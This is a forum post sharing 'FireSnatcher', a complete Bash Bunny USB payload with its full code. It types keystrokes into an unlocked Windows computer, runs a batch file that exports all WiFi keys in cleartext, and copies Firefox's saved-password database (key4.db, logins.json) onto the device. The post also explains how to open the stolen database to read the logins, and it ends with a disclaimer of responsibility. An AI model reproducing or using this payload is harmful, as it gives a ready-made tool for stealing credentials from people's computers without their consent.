credentials [PAYLOAD] FireSnatcher

[KarrotKak3]

Greetings. This is my First Payload written for the Bash Bunny.

https://github.com/KarrotKak3/FireSnatcher.git

 

# Props:         saintcrossbow & 0iphor13 - I used their work for examples
 

# Full Description
# ----------------
#   Attacks an Unlocked Windows Machine
#  Payload targets:
#    - All WiFi creds
#    - Firefox Saved Password Database
#
#  PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
 

# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds

#   KNOWN ISSUES
#  ---------------
#  Loot is saved in Payloads/switch#/loot
 

CODE:

Payload.txt

# Title:         FireSnatcher
# Description:   Copies Wifi Keys, and Firefox Password Databases
# Author:        KarrotKak3
# Props:         saintcrossbow & 0iphor13
# Version:       1.0.2.0 (Work in Progress)
# Category:      Credentials
# Target:        Windows (Logged in) 
# Attackmodes:   HID, Storage

# Full Description
# ----------------
#   Attacks an Unlocked Windows Machine
#  Payload targets:
#    - All WiFi creds
#    - Firefox Saved Password Database
#
#  PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
#    Delays to Allow Powershell Time to Open and to Give Attack time to Run

# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
#   %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
#     Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins


#   KNOWN ISSUES
#  ---------------
#  Loot is saved in Payloads/switch#/loot


# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds


# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility

# LEDs
# ----
# Magenta: Initial setup – about 1 – 3 seconds
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed

# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"

# Setup
# -----
LED SETUP


# Attack
# ------
ATTACKMODE HID STORAGE
Q DELAY 500
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell
Q ENTER
Q DELAY 7000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
Q ENTER
Q DELAY 8000
Q STRING EXIT
Q ENTER
sync
LED FINISH
Q DELAY 1500
shutdown now

FireSnatcher.bat

mkdir %~dp0\loot\%COMPUTERNAME%
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
C: cd \D %appdata%\mozilla\firefox\profiles\
cd %appdata%\mozilla\firefox\profiles\*.default-release\
copy key4.db %~dp0\loot\%COMPUTERNAME%
copy logins.json %~dp0\loot\%COMPUTERNAME%

##
## Usage: Make Files Payload.txt and FireSnatcher.bat containing above code
##              Copy Both files to either Payloads\{switch1 or switch2}
##
##       Loot will be copied to .\payloads\{switch}\loot instead of .\loot

 

As Always, I am not Responsible for what you do with this payload.

 

   KarrotKak3

[KarrotKak3]

HOW TO USE PASSWORD DB:

COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
#   %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
#     Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins